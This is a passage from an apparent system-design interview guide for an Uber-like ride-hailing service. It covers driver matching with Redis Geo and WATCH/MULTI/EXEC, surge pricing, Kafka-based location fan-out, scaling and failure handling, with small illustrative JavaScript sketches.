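print(f"WebSocket bandwidth: {ws_bytes_per_sec / 1e6:.1f} MB/s")
print(f"HTTP bandwidth:      {http_bytes_per_sec / 1e9:.2f} GB/s")
print(f"trip storage:        {trip_storage_gb_per_day:.0f} GB/day")
print(f"waypoint storage:    {waypoint_storage_gb_per_day:.0f} GB/day")
```

The 100x bandwidth gap comes entirely from the per-message size (20 bytes versus roughly 2 KB), so it holds at any update rate.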

These numbers drive the following decisions: Redis for geospatial search (not PostGIS), WebSocket (not HTTP polling), Kafka for fan-out (not direct server-to-server calls), and state-adaptive location frequency (not a fixed 1s tick).

3. Functional Requirements

Rider gets a fare estimate (per vehicle type) for a pickup and drop location
Rider books a ride; system matches a nearby available driver within 60 seconds
Driver accepts or denies the ride offer (15-second window)
Both rider and driver track each other on a live map
Trip starts and ends; fare is finalized and payment is processed
Rider and driver rate each other after trip completion
Rider can cancel a ride before driver arrival; driver can cancel before trip start

4. Non-Functional Requirements

Requirement	Target
Latency — driver matching	< 300ms to dispatch first offer
Latency — location update visible to rider	< 2s end-to-end
Availability (rider-facing)	99.9% — app down = revenue loss
Consistency (driver assignment)	Strong — a driver must never be assigned to two rides simultaneously
Durability (trip + billing data)	Zero loss — replicated DB + Kafka retention
Location update throughput	1.67M writes/sec sustained
WebSocket connections	7M concurrent at peak

Consistency Model by Component:

Component	Consistency	Why
Driver assignment (Redis WATCH/MULTI/EXEC)	Strong	Prevents double-booking
Driver location (Redis Geo)	Eventual	Overwrites on next tick; ephemeral
Trip record (PostgreSQL)	Strong (ACID)	Financial correctness
Surge multiplier (Redis cache)	Eventual (60s TTL)	Slight staleness is acceptable
Ride history (read replica)	Eventual	Acceptable for non-real-time reads

[!IMPORTANT]
CAP Theorem framing: This system intentionally makes different consistency trade-offs per component. Rider-facing read services (fare estimate, history) prefer availability. Driver assignment prefers strong consistency. Stating this explicitly in an interview shows CAP awareness at a component level — not a single global answer.

5. 🧠 Mental Model

Uber is two concurrent real-time systems: location tracking and driver matching. Every 1–5 seconds, millions of drivers push their GPS coordinates into a geo-indexed in-memory store. When a rider requests a trip, the system finds the closest available driver by ETA (not distance), atomically assigns them via a state transition, and keeps both maps in sync — all under 300ms. The hardest problems are concurrency (preventing double-booking) and geospatial search at scale.

                ┌──────────────────────────────────────────────────────────────┐
                │                     FAST PATH                                 │
 ┌──────────┐  │  ┌───────────────┐  GEORADIUS   ┌──────────────┐             │
 │  Driver  │──►  │ Location Svc  │ ───────────► │ Match Engine │ ──► Driver  │
 │  App     │  │  │ (Redis Geo)   │              │ (top K score)│    notified  │
 └──────────┘  │  └───────────────┘              └──────┬───────┘             │
  every 1-5s   │                                        │ WATCH/MULTI/EXEC    │
               └────────────────────────────────────────┼─────────────────────┘
                                                         │
               ┌─────────────────────────────────────────▼────────────────────┐
               │                    RELIABLE PATH                               │
               │  Trip event ──► Kafka ──► Trip DB (PostgreSQL)                │
               │  (start, end, fare, route) — durable, for billing + history   │
               └──────────────────────────────────────────────────────────────┘

Core Design Principles

Path	Optimized For	Mechanism
Fast Path — matching	Latency (< 300ms end-to-end)	Driver WS → Redis GEOADD → GEORADIUS → WATCH/MULTI/EXEC → WS push to driver
Fast Path — live tracking	Low-latency map sync	Location Svc → Kafka → rider WebSocket (ON_TRIP only)
Reliable Path — billing	Durability (zero revenue loss)	trip_start / trip_end → Kafka → PostgreSQL (replicated)
Ephemeral data	Sub-ms reads, auto-expiry on disconnect	Driver state + location in Redis with TTL
Durable data	Correct billing, audit, replay	Trip events event-sourced into PostgreSQL via Kafka

[!IMPORTANT]
Driver location is fast path only. Location is overwritten every 1–5 seconds — only the latest value matters. Trip events are reliable path — they drive billing. Never conflate ephemeral real-time data (location) with durable transactional data (trip records).

[!NOTE]
Key Insight: Both paths run concurrently on every event — they are not sequential. The fast path can fail and self-heal. The reliable path must not fail. Redis TTL is not a weakness; it is the correct primitive for data with a natural expiry.

6. API Design

Rider APIs

Method	Path	Description
POST	/api/v1/rides/request	Request ride {pickup_lat, pickup_lng, dest_lat, dest_lng}, returns {ride_id, fare_estimate, eta}
GET	/api/v1/rides/{id}/status	Poll ride status + driver location
DELETE	/api/v1/rides/{id}	Cancel ride (before driver assigned)
POST	/api/v1/rides/{id}/rating	Rate driver post-ride

Driver APIs

Method	Path	Description
PUT	/api/v1/drivers/availability	Toggle online/offline with current location
POST	/api/v1/rides/{id}/accept	Accept dispatched ride request
PUT	/api/v1/rides/{id}/status	Update status: ARRIVED, STARTED, COMPLETED
POST	/api/v1/drivers/location	GPS ping {lat, lng} every 1–5s, depending on driver state

[!NOTE]
Async matching design: POST /rides/request is synchronous only for fare estimation. Driver matching happens asynchronously — the client polls GET /rides/{id}/status. This is why the system can afford to try multiple drivers without blocking the rider.

7. End-to-End Flow

The story in plain English:

Rider taps "Request Ride": the app sends POST /rides/request with pickup and destination coordinates.
Match Service queries Redis Geo: GEORADIUS drivers:idle:city 3km — returns all idle drivers sorted by distance.
Match Service filters by vehicle type, rating, and acceptance rate, then ranks by estimated ETA.
The top driver is atomically reserved in Redis using WATCH/MULTI/EXEC — this prevents two rides from being assigned to the same driver simultaneously (the classic race condition).
A push notification is sent to the driver's app: "New ride offer — 15 seconds to respond."
Driver accepts → Match Service confirms the assignment (the driver has been RESERVED in Redis since the atomic step above) and pushes a WebSocket event to the rider: "Driver assigned, ETA 4 min."
Real-time tracking begins. Driver app sends GPS pings every 1–2 seconds via WebSocket.
Location Service writes to Redis Geo (overwrites driver position) and publishes to Kafka. A consumer on the rider's server reads the Kafka event and pushes the updated position to the rider's app over WebSocket.
Driver arrives, starts trip → status set to ON_TRIP in Redis. Trip start event persisted to PostgreSQL via Kafka.
Driver ends trip → POST /rides/{id}/end with final distance. Fare is calculated and charged asynchronously via Payment Service (Kafka consumer).
Driver state returns to IDLE in Redis Geo pool — immediately available for the next ride.
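
The flow above moves each driver through three states. A minimal sketch of that state machine follows; the transition table (including RESERVED back to IDLE for a declined or timed-out offer) and the `nextState` helper are illustrative assumptions, not the article's implementation.

```javascript
// Allowed driver state transitions, mirroring the states named in the flow.
// The table itself is an illustrative assumption.
const TRANSITIONS = {
  IDLE: ["RESERVED"],
  RESERVED: ["ON_TRIP", "IDLE"], // IDLE covers a declined or timed-out offer
  ON_TRIP: ["IDLE"],
};

// Returns the target state, or throws if the move is not allowed.
function nextState(current, target) {
  const allowed = TRANSITIONS[current] ?? [];
  if (!allowed.includes(target)) {
    throw new Error(`illegal transition ${current} -> ${target}`);
  }
  return target;
}

// Walk one complete ride: offer, pickup, drop-off.
let state = "IDLE";
for (const step of ["RESERVED", "ON_TRIP", "IDLE"]) {
  state = nextState(state, step);
}
console.log(state); // IDLE
```

Rejecting illegal moves in one place is what lets the rest of the design treat the state value as the single source of truth.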

╔═════════════════════════════════════════════════════════════════╗
║          UBER / RAPIDO — FULL RIDE BOOKING SEQUENCE                     ║
╚═════════════════════════════════════════════════════════════════╝

PHASE 1 — REQUEST & DRIVER MATCHING
──────────────────────────────────────────────────────────────────────────
  Rider      LB       Match     Redis    Notify    Driver
    │          │         │         │         │         │
    │─POST /rides────────►         │         │         │
    │          │─forward─►         │         │         │
    │          │         │         │         │         │
    │          │   ┌─ STEP 1: GEO SEARCH ──────────────────────────────┐
    │          │   │  GEORADIUS drivers:idle:city 3km COUNT 100         │
    │          │   └────────────────────────────────────────────────────┘
    │          │         │─GEORADIUS──►│         │         │
    │          │         │◄──[d001: 0.3km, d002: 0.7km]    │     │
    │          │         │         │         │         │
    │          │   ┌─ STEP 2: FILTER + ETA RANK ───────────────────────┐
    │          │   │  filter: state=IDLE, vehicle type, rating          │
    │          │   │  rank: by ETA (not distance)                       │
    │          │   └────────────────────────────────────────────────────┘
    │          │         │         │         │         │
    │          │   ┌─ STEP 3: ATOMIC ASSIGNMENT ───────────────────────┐
    │          │   │  WATCH / MULTI / EXEC: prevents double booking     │
    │          │   └────────────────────────────────────────────────────┘
    │          │         │─WATCH───►│         │         │
    │          │         │─MULTI───►│         │         │
    │          │         │◄── EXEC OK (d001 → RESERVED) │         │
    │          │         │         │         │          │
    │          │         │─────────────push offer──────►│         │
    │          │         │         │         │─WS offer (15s)────►│
    │          │         │         │         │          │
    │          │◄─────────────────────────────d001: ACCEPT─────────│
    │          │─accepted►│        │         │         │
    │◄── WS: driver assigned, ETA 4 min ─────│         │         │
    │          │         │         │         │         │


PHASE 2 — REAL-TIME GPS TRACKING  (ON_TRIP)
──────────────────────────────────────────────────────────────────────────
  Driver    Loc Svc    Redis      Kafka      Rider
    │           │          │          │          │
    │─WS: lat/lng every 1s─►          │          │
    │           │─GEOADD───►│         │          │
    │           │  (overwrites previous position)│          │
    │           │─location_update───────►│       │
    │           │          │          │─WS: driver moved──►│
    │           │          │          │    (< 2s lag)      │
    │           │          │          │          │
    │  [driver taps Picked Up]         │         │
    │─PUT /rides/id/status──►          │         │
    │           │─status_changed────────►│       │
    │           │          │          │─WS: "Rider picked up"──►│
    │           │          │          │          │


PHASE 3 — TRIP START → END → PAYMENT
──────────────────────────────────────────────────────────────────────────
  Driver     LB       Match     Redis     Kafka    PaySvc     DB
    │          │         │          │         │         │        │
    │─POST /rides/start───►         │         │         │        │
    │          │─────────►│         │         │         │        │
    │          │         │─SET ON_TRIP────►   │         │        │
    │          │         │─trip_start event────►│       │        │
    │          │         │         │         │──────────────────►│
    │          │         │         │         │         persist   │
    │          │         │         │         │         trip row  │
    │          │         │         │         │          │        │
    │─POST /rides/end─────►         │        │          │        │
    │          │─────────►│         │        │          │        │
    │          │         │─trip_end event──────►│       │        │
    │          │         │         │         │─charge rider──────►│  ← wait for OK
    │          │         │         │         │◄── payment OK ────│    
    │          │         │         │         │─finalize trip ────────────►│
    │          │         │─SET IDLE─►│         │          │     │
    │◄── WS: payment confirmed ───────────────────────────│     │
    │          │         │         │         │         │        │

8. High-Level Architecture

Simple Design

Evolved Design (with Kafka and Surge Pricing)

9. Data Model

Entity	Storage	Key Columns	Why this store
Driver live location	Redis Geo sorted set	drivers:idle:city → driver_id, lng, lat	1.67M writes/sec; ephemeral; sub-ms GEORADIUS queries
Driver state	Redis key-value with TTL	driver:state:driver_id → IDLE / RESERVED / ON_TRIP	Atomic WATCH/EXEC for double-booking prevention; TTL self-heals on disconnect
Trip record	PostgreSQL	trip_id, rider_id, driver_id, status, pickup, dropoff, fare, started_at, ended_at	ACID for financial correctness; strong consistency on fare and payment
Payment record	PostgreSQL	payment_id, trip_id, amount, status, method, created_at	ACID; joins with trip record for reconciliation
Surge multiplier	Redis key-value with TTL 60s	surge:geohash → multiplier float	Cache layer; 60s staleness acceptable; Surge Calculator writes, Ride Service reads
Ride request log	Analytics DB (Cassandra or BigQuery)	request_id, geohash, vehicle_type, timestamp	High-write analytics; feeds Surge Calculator; no ACID needed
Waypoints (GPS trace)	Object storage (S3)	waypoints/trip_id.jsonl	~160 GB/day; cold after trip ends; no random access needed
Driver metadata	PostgreSQL + Redis cache	driver_id, name, vehicle, rating, acceptance_rate	Static metadata; cached in Redis TTL 5m after first read
User / rider profile	PostgreSQL	user_id, name, phone, email, payment_method	Relational; infrequent writes; strong consistency on payment method

10. Deep Dives

10.1 Driver Matching with Geohash and Atomic Assignment

Here is the problem we are solving: when a rider requests a trip, find the best available nearby driver, offer them the ride, and assign them atomically, without double-booking, in under 300ms. Five million drivers are in the pool, so scanning every driver row in the DB on each request is not an option.

Naive solution fails: A full-table scan of 5M driver rows per ride request at 500K peak requests/sec = 2.5 trillion row scans per second. No relational DB survives this.

Chosen solution — five-step pipeline:

Step 1: Geo index search     -> GEORADIUS -> top 100 candidates within 2km
Step 2: Eligibility filter   -> state=IDLE, vehicle type, rating, acceptance rate
Step 3: ETA-based ranking    -> call routing engine for top 20; score by ETA + quality
Step 4: Sequential dispatch  -> offer to top driver, 15s window; expand if exhausted
Step 5: Atomic state lock    -> WATCH/MULTI/EXEC: IDLE -> RESERVED atomically
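
Steps 2 and 3 can be sketched as a filter followed by a sort. The candidate shape and the `rankCandidates` helper are hypothetical, and `etaSeconds` is supplied directly here where a real system would ask a routing engine.

```javascript
// Hypothetical candidate shape: { id, state, vehicleType, rating, etaSeconds }.
// etaSeconds would normally come from a routing engine; here it is given.
function rankCandidates(candidates, { vehicleType, minRating }) {
  return candidates
    .filter((d) => d.state === "IDLE")
    .filter((d) => d.vehicleType === vehicleType && d.rating >= minRating)
    .sort((a, b) => a.etaSeconds - b.etaSeconds); // fastest pickup first
}

const candidates = [
  { id: "d001", state: "IDLE", vehicleType: "sedan", rating: 4.8, distanceKm: 0.5, etaSeconds: 420 },
  { id: "d002", state: "IDLE", vehicleType: "sedan", rating: 4.6, distanceKm: 1.2, etaSeconds: 180 },
  { id: "d003", state: "ON_TRIP", vehicleType: "sedan", rating: 4.9, distanceKm: 0.2, etaSeconds: 60 },
  { id: "d004", state: "IDLE", vehicleType: "sedan", rating: 3.9, distanceKm: 0.4, etaSeconds: 120 },
];

const ranked = rankCandidates(candidates, { vehicleType: "sedan", minRating: 4.5 });
console.log(ranked.map((d) => d.id)); // [ 'd002', 'd001' ]
```

Note that d002 outranks d001 even though it is farther away: its ETA is shorter, which is the point of ranking by ETA rather than distance.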

Why H3 over plain geohash for production:

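Geohash cells are rectangles: the distance from a cell's center to its corners is longer than to its edges, so a search that expands cell by cell covers an uneven radius. Uber's H3 uses hexagons, whose six neighbors are all roughly equidistant from the center, so "expand to adjacent cell" grows coverage uniformly in all directions. For this design, Redis's built-in GEORADIUS (geohash-based) is acceptable; H3 is the production upgrade. On Redis 6.2 and later, GEORADIUS is deprecated in favor of GEOSEARCH, which serves the same center-plus-radius query.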

The atomic assignment — no separate lock service:

WATCH driver:state:driver_001
  current = GET driver:state:driver_001
  IF current != "IDLE": UNWATCH  -- another server got here first; try the next candidate
MULTI
  SET driver:state:driver_001  RESERVED  EX 30
  ZREM drivers:idle:bangalore  driver_001
EXEC
  -> nil       watched key changed between WATCH and EXEC; nothing applied, skip driver
  -> [OK, 1]   atomic commit: driver is RESERVED and removed from the idle pool

Two servers racing to reserve the same driver: only one EXEC commits. The other gets nil and moves to the next candidate. No separate lock key. No lock service. The state is the truth.
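
The race can be modeled without a Redis server. The sketch below is an in-memory stand-in, assuming a per-key version counter in place of Redis's internal WATCH bookkeeping; `OptimisticStore` and `tryReserve` are hypothetical names, not a Redis client API.

```javascript
// In-memory model of WATCH-style optimistic locking. Each key carries a
// version that bumps on every write; exec() commits only if the version seen
// at watch() time is unchanged. This is a model, not a Redis client.
class OptimisticStore {
  constructor() {
    this.data = new Map(); // key -> { value, version }
  }
  set(key, value) {
    const version = (this.data.get(key)?.version ?? 0) + 1;
    this.data.set(key, { value, version });
  }
  watch(key) {
    const entry = this.data.get(key);
    return { key, value: entry?.value, version: entry?.version ?? 0 };
  }
  // Returns true when the write commits, false when the key changed (EXEC -> nil).
  exec(watched, newValue) {
    const currentVersion = this.data.get(watched.key)?.version ?? 0;
    if (currentVersion !== watched.version) return false;
    this.set(watched.key, newValue);
    return true;
  }
}

function tryReserve(store, watched) {
  if (watched.value !== "IDLE") return false; // someone else already has the driver
  return store.exec(watched, "RESERVED");
}

const store = new OptimisticStore();
store.set("driver:state:driver_001", "IDLE");

// Two match servers read the same IDLE state before either writes.
const serverA = store.watch("driver:state:driver_001");
const serverB = store.watch("driver:state:driver_001");

const aWon = tryReserve(store, serverA);
const bWon = tryReserve(store, serverB);
console.log(aWon, bWon); // true false
```

Server B still believes the driver is IDLE, but its commit is rejected because the key changed after it looked, which is the behavior the nil reply from EXEC signals.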

Dispatch expansion:

Round 1: 2km, 2-min timeout  -- quality match (close driver, good ETA)
Round 2: 3km, 2-min timeout  -- balance quality + availability
Round 3: 5km, 2-min timeout  -- availability over quality
Round 4: fail request        -- "no driver found"
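
The expansion rounds can be sketched as a loop over radii. `findDrivers` and `offer` are hypothetical callbacks, and the per-round timeout is left out to keep the example synchronous.

```javascript
// Radii follow the rounds listed above. findDrivers(radiusKm) is a hypothetical
// lookup returning candidate ids; offer(driverId) returns true on acceptance.
const ROUNDS_KM = [2, 3, 5];

function dispatch(findDrivers, offer) {
  const alreadyOffered = new Set();
  for (const radiusKm of ROUNDS_KM) {
    for (const driverId of findDrivers(radiusKm)) {
      if (alreadyOffered.has(driverId)) continue; // do not re-offer after a decline
      alreadyOffered.add(driverId);
      if (offer(driverId)) return { driverId, radiusKm };
    }
  }
  return null; // Round 4: "no driver found"
}

// Toy data: distance of each driver from the pickup point, in km.
const driverDistances = { d001: 1.5, d002: 2.6, d003: 4.1 };
const within = (radiusKm) =>
  Object.keys(driverDistances).filter((id) => driverDistances[id] <= radiusKm);

// d001 declines, d002 accepts.
const result = dispatch(within, (id) => id === "d002");
console.log(result); // { driverId: 'd002', radiusKm: 3 }
```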

[!NOTE]
Key Insight: Matching is not about finding the nearest driver — it is about finding the fastest pickup. ETA is the metric, not distance. A driver 0.5km away in traffic has a worse ETA than one 1.2km away on an open road. Every system that ranks by distance is optimizing for the wrong thing.

[!IMPORTANT]
State machine replaces distributed locks. The atomic IDLE → RESERVED transition ensures a driver is either fully available or fully reserved — never both. No ZooKeeper, no Redlock, no DB row lock. The state is the truth.

10.2 Surge Pricing Algorithm

Here is the problem we are solving: at peak demand, more riders request rides than drivers are available. Without price adjustment, all riders compete for the same few drivers, matching fails, and drivers earn less. Surge pricing signals scarcity to both sides — it is a market-clearing mechanism, not a revenue grab.

Naive solution fails: Static per-km rates mean the same price during a 3am downpour as a sunny Tuesday morning. Matching rate drops. Rider wait times spike. Drivers have no incentive to come online.

Chosen solution — demand-signal feedback loop:

demand_ratio = active_ride_requests / idle_drivers_in_cell
multiplier:
ratio < 1.0 -> 1.0x (supply exceeds demand)
ratio 1.0-1.5 -> 1.2x
ratio 1.5-2.0 -> 1.5x
ratio 2.0-3.0 -> 2.0x
ratio > 3.0 -> 3.0x (capped -- prevents extreme pricing)


- Surge Calculator runs every 60 seconds, writes `surge:{geohash}` to Redis (TTL 60s)
- Ride Service reads the multiplier on each fare call (sub-ms Redis read)
- Rider sees the multiplier before confirming — informed consent (legal requirement in most markets)
- Surge does not affect matching logic — it only affects the fare shown to the rider
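
The multiplier table can be written as a small lookup. This sketch assumes half-open buckets so that a boundary ratio such as 1.5 maps to exactly one multiplier, and it assumes the cap applies when a cell has requests but no idle drivers; the table above does not specify either case.

```javascript
// Half-open buckets [lower, upper): a ratio equal to a boundary falls into the
// higher bucket. This boundary handling is an assumption.
const SURGE_BUCKETS = [
  { below: 1.0, multiplier: 1.0 },
  { below: 1.5, multiplier: 1.2 },
  { below: 2.0, multiplier: 1.5 },
  { below: 3.0, multiplier: 2.0 },
];
const SURGE_CAP = 3.0;

function surgeMultiplier(activeRequests, idleDrivers) {
  // No idle drivers: avoid dividing by zero and treat any demand as capped surge.
  if (idleDrivers === 0) return activeRequests > 0 ? SURGE_CAP : 1.0;
  const ratio = activeRequests / idleDrivers;
  const bucket = SURGE_BUCKETS.find((b) => ratio < b.below);
  return bucket ? bucket.multiplier : SURGE_CAP;
}

console.log(surgeMultiplier(40, 100)); // 1
console.log(surgeMultiplier(150, 100)); // 1.5
console.log(surgeMultiplier(900, 100)); // 3
```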

[!NOTE]
Key Insight: Surge pricing is a read-path concern only — it does not affect matching. The Surge Calculator is a separate service feeding data into Redis. The matching engine never reads it. Decoupling surge calculation from matching prevents a slow analytics query from blocking a 300ms matching window.

Trade-off — eventual consistency on surge: A 60-second Redis TTL means surge multiplier can be up to 60s stale. A rider booking 30 seconds after a demand spike may see the old price. This is acceptable: the fare shown at request time is the fare charged (contractual), and 60s staleness does not meaningfully harm either party.

10.3 Real-Time Location Write Architecture

Here is the problem we are solving: 1.67 million GPS updates arrive per second from driver devices. Each update must be indexed for sub-ms geospatial lookup. The rider tracking a trip must see the driver move smoothly on their map — but the rider and driver are on different backend servers.

Naive solution fails: Writing 1.67M rows/sec to a relational DB creates disk I/O saturation within minutes. Direct server-to-server WebSocket push (Server A to Server B) is impossible in a stateless distributed deployment.

Chosen solution — three-layer architecture:

Layer 1 — Write batching: Location Service buffers 500ms of updates and pipeline-writes to Redis in one round-trip. This reduces Redis round-trips 3–5x without increasing visible latency to the rider (500ms is imperceptible vs 1s update tick).
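
A minimal sketch of the batching idea follows. It assumes the buffer keeps only the latest ping per driver (reasonable, since older positions are overwritten anyway) and models the pipelined Redis write as a single callback; `LocationBuffer` is a hypothetical name.

```javascript
// Buffers location pings and keeps only the latest one per driver. flush()
// hands the whole batch to a writer in one call, standing in for one pipelined
// Redis round-trip.
class LocationBuffer {
  constructor(writeBatch) {
    this.writeBatch = writeBatch;
    this.pending = new Map(); // driverId -> { lat, lng }
  }
  push(driverId, lat, lng) {
    this.pending.set(driverId, { lat, lng }); // newer ping overwrites older one
  }
  flush() {
    if (this.pending.size === 0) return 0;
    const batch = [...this.pending.entries()];
    this.pending.clear();
    this.writeBatch(batch);
    return batch.length;
  }
}

const roundTrips = [];
const buffer = new LocationBuffer((batch) => roundTrips.push(batch));

buffer.push("d001", 12.9716, 77.5946);
buffer.push("d002", 12.9352, 77.6245);
buffer.push("d001", 12.972, 77.595); // supersedes the first d001 ping

const written = buffer.flush();
console.log(written, roundTrips.length); // 2 1
```

In a running service, `flush()` would be driven by a timer such as `setInterval(() => buffer.flush(), 500)` to match the 500ms window.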

Layer 2 — Redis Geo sorted set: GEOADD overwrites the previous coordinate (O(log N) per write). GEORADIUS scans a bounding box (O(N+log M)). No locking. No transactions. This is why Redis Geo handles 1.67M concurrent writes while serving sub-10ms matching queries simultaneously.

Layer 3 — Kafka fan-out for ON_TRIP tracking:

The Location Service publishes each ON_TRIP update to Kafka. A consumer on the server that holds the rider's WebSocket reads the event and pushes the new position to the rider's app.

State-adaptive update frequency — accuracy vs cost:

Driver state	Update frequency	Redis writes/sec at 5M drivers	Why this frequency
IDLE	Every 5s	1M writes/sec	No rider watching — coarse position enough for matching
RESERVED	Every 2s	2.5M writes/sec	Rider watching ETA countdown on map
ON_TRIP	Every 1s	5M writes/sec	Rider watching live position; smooth animation required

Sending 1-second updates from IDLE drivers wastes 60–70% of Redis write capacity for zero rider-visible benefit. The state machine already knows each driver's state — frequency is derived from it for free.
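
The saving can be checked with a few lines of arithmetic. The intervals come from the table above; the fleet mix is a hypothetical example chosen only for illustration.

```javascript
// Update intervals per state, taken from the table above.
const UPDATE_INTERVAL_SECONDS = { IDLE: 5, RESERVED: 2, ON_TRIP: 1 };

// driversByState maps a state to how many drivers are currently in it.
function writesPerSecond(driversByState) {
  return Object.entries(driversByState).reduce(
    (total, [state, count]) => total + count / UPDATE_INTERVAL_SECONDS[state],
    0
  );
}

// Hypothetical fleet mix (assumption): most drivers idle, a minority on trips.
const fleet = { IDLE: 4_000_000, RESERVED: 200_000, ON_TRIP: 800_000 };
const totalDrivers = 5_000_000;

const adaptive = writesPerSecond(fleet);
const fixedOneSecond = totalDrivers / 1; // every driver pinging once per second
console.log(adaptive); // 1700000
console.log((1 - adaptive / fixedOneSecond).toFixed(2)); // 0.66
```

With this mix the adaptive schedule lands near the 1.67M writes/sec budget and inside the 60–70% reduction range quoted above.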

Stale location self-healing:

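Driver phone disconnects -> WebSocket closes -> Location Svc detects
  -> EXPIRE driver:state:driver_id 30
  -> After 30s with no heartbeat: state key expires
  -> Geo set members carry no TTL of their own, so the state=IDLE filter skips the driver
     (one option: ZREM the stale Geo entry when the matcher next encounters it)
  -> No stale drivers offered to riders. No cron job needed.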

[!IMPORTANT]
Fan-out via Kafka is a correctness requirement, not a performance optimization. Without it, location updates only reach the rider if they happen to be on the same server as the driver — never guaranteed in a distributed deployment.
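
The fan-out can be illustrated with an in-process stand-in for the topic. `Topic` and `WsServer` are hypothetical names, and arrays stand in for WebSocket connections; real Kafka adds partitions, offsets, and consumer groups that this sketch ignores.

```javascript
// Minimal stand-in for a Kafka topic: every subscribed server sees every event
// and decides locally whether it holds the rider's socket.
class Topic {
  constructor() { this.subscribers = []; }
  subscribe(handler) { this.subscribers.push(handler); }
  publish(event) { this.subscribers.forEach((handler) => handler(event)); }
}

class WsServer {
  constructor(name, topic) {
    this.name = name;
    this.ridersByTrip = new Map(); // tripId -> array standing in for a rider socket
    topic.subscribe((event) => this.onLocation(event));
  }
  attachRider(tripId) {
    const socket = [];
    this.ridersByTrip.set(tripId, socket);
    return socket;
  }
  onLocation(event) {
    const socket = this.ridersByTrip.get(event.tripId);
    if (socket) socket.push({ lat: event.lat, lng: event.lng }); // "WS push"
  }
}

const locationUpdates = new Topic();
const driverSideServer = new WsServer("A", locationUpdates); // driver is connected here
const riderSideServer = new WsServer("B", locationUpdates); // rider is connected here
const riderSocket = riderSideServer.attachRider("trip-42");

// Server A receives the driver's ping and publishes it; server B delivers it.
locationUpdates.publish({ tripId: "trip-42", lat: 12.9716, lng: 77.5946 });
console.log(riderSocket.length); // 1
```

Neither server needs to know where the other party is connected; the topic is the only shared piece.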

[!NOTE]
Key Insight: Write path and read path never conflict in Redis Geo. Writes overwrite one sorted set entry (O(log N)). Reads scan a bounding box (O(N+log M)). No locking. This is why Redis Geo handles 1.67M concurrent writes while serving sub-10ms matching queries.

11. Bottlenecks & Scaling

What breaks first as scale grows 10x:

Bottleneck	Breaks at	Strategy
Redis location write throughput	~10M writes/sec	Shard by city/region: drivers:idle:bangalore, drivers:idle:mumbai. Each shard is an independent Redis cluster.
Match Service fan-out at surge	500K ride requests/sec	Horizontal scale (stateless service); partition ride requests by pickup geohash — each Match Service shard owns a set of cells.
PostgreSQL trip writes	~100K writes/sec per primary	Kafka consumers batch-insert trips (bulk insert 1000 rows vs 1 per event). Add read replicas for ride history queries.
WebSocket server connections	~100K connections per server	Sticky load balancing by driver_id hash; horizontal scale to 70+ servers for 7M connections.
Surge Calculator at 10x cities	Slow DB scan	Pre-aggregate demand counts per geohash cell using Kafka Streams (rolling 5-min window) — write results to Redis instead of scanning the full ride request DB.

Caching strategy:

Driver metadata (name, vehicle, rating): Redis cache TTL 5 minutes — reads on every matching request
Surge multiplier: Redis TTL 60s — Surge Calculator writes, Ride Service reads
Rate table (price/km): Redis TTL 1 hour — changes infrequently
Ride history: read replica + application-level pagination — no caching needed (user reads once)

CDN / Edge: Not applicable to the core matching path. Rider and driver apps download static assets (map tiles, app bundles) via CDN. Dynamic API calls and WebSockets must reach origin.

12. Failure Scenarios

Failure	Impact	Recovery
Redis primary fails (location + state)	Matching halts; active trips lose live map	Redis Sentinel / Cluster failover in < 30s. Drivers re-register within 15s via heartbeat. Active trips re-establish tracking via Kafka (reliable path unaffected).
Match Service instance crashes mid-assignment	Driver reserved but no offer sent; driver stuck in RESERVED	The 30s TTL on driver:state expires and the key is deleted; the driver's next heartbeat re-registers it as IDLE. The rider request is retried via a Kafka dead-letter queue.
Kafka broker failure	Trip events delayed; live tracking fan-out delayed	Kafka cluster replication (RF=3); consumer lag; events replayed on broker recovery. No data loss.
PostgreSQL primary fails	Trip write fails; billing delayed	PostgreSQL replica promoted (RDS Multi-AZ: < 60s). Kafka retains events during failover — no billing data lost.
Driver app disconnects mid-trip	Location updates stop; rider map freezes	Rider shown "signal lost" UI. Driver reconnects and resumes. If no reconnect in 30s: TTL expires, trip marked as interrupted, ops notified.
Payment Service unavailable	Fare not charged at trip end	Kafka retains trip_end event. Payment Service processes on recovery. Idempotency key prevents double-charge.
Surge Calculator crash	Surge multiplier stale (60s TTL expiry)	Redis TTL expires → fallback to 1x. Surge Calculator restarts; resumes writing within seconds. Brief under-pricing acceptable.
Double-booking race condition	Two servers attempt to reserve the same driver	Redis WATCH/MULTI/EXEC: only one EXEC succeeds. Second server gets nil, skips driver, tries next candidate. Zero double-bookings.
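
The idempotency key mentioned for the Payment Service can be sketched as follows. Using the trip id as the key and an in-memory map as the store are assumptions for illustration; a production service would persist the key with an atomic check, for example a unique constraint.

```javascript
// Hypothetical payment handler: the trip id doubles as the idempotency key, so
// a redelivered trip_end event returns the stored receipt instead of charging again.
class PaymentService {
  constructor() {
    this.processed = new Map(); // idempotencyKey -> receipt
    this.chargeCount = 0;
  }
  handleTripEnd(event) {
    const key = `charge:${event.tripId}`;
    if (this.processed.has(key)) return this.processed.get(key);
    this.chargeCount += 1; // stands in for the call to the payment gateway
    const receipt = { tripId: event.tripId, amount: event.fare, status: "CHARGED" };
    this.processed.set(key, receipt);
    return receipt;
  }
}

const payments = new PaymentService();
const tripEnd = { tripId: "trip-42", fare: 18.5 };

const firstReceipt = payments.handleTripEnd(tripEnd);
const replayedReceipt = payments.handleTripEnd(tripEnd); // replayed after a consumer restart
console.log(payments.chargeCount); // 1
```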

13. Trade-offs

Geohash vs Quadtree for Driver Geospatial Index

Dimension	Geohash (Redis Geo)	Quadtree
Cell shape	Rectangle — uneven diagonal vs edge distance	Adaptive subdivision — cells match data density
Neighbor lookup	Must check up to 9 cells for edge cases	Clean tree traversal — 4 children per node
Write throughput	In-memory sorted set — 1.67M writes/sec	Tree rebalancing on write — slower at high write rates
Operational cost	Redis built-in GEORADIUS — zero extra infra	Custom service or library — additional complexity
Production use	Industry standard for most systems	Better for non-uniform density (dense city vs rural)

Chosen: Redis Geo (geohash). It is already in the stack for driver state and atomic assignment, and GEORADIUS is a single command. The trade-off I accept is rectangular cells with slight edge distortion, which is acceptable because we expand to adjacent cells on radius expansion and the distortion (< 5% area difference) does not materially affect ETA accuracy.

[!NOTE]
Key Insight: H3 hexagons (Uber's production choice) solve the corner-distance problem but require a custom indexing layer. For most systems, Redis GEORADIUS is the right default — zero extra infrastructure, built-in neighbor search, proven at scale.

WebSocket vs HTTP Polling for Live Tracking

Dimension	WebSocket	HTTP Polling
Connection overhead	Persistent — one TLS handshake, then frames	New HTTP request per update — TLS + headers each time
Write volume at 5M drivers	1.67M x 20B frames = 33 MB/s	1.67M x 2KB headers = 3.3 GB/s
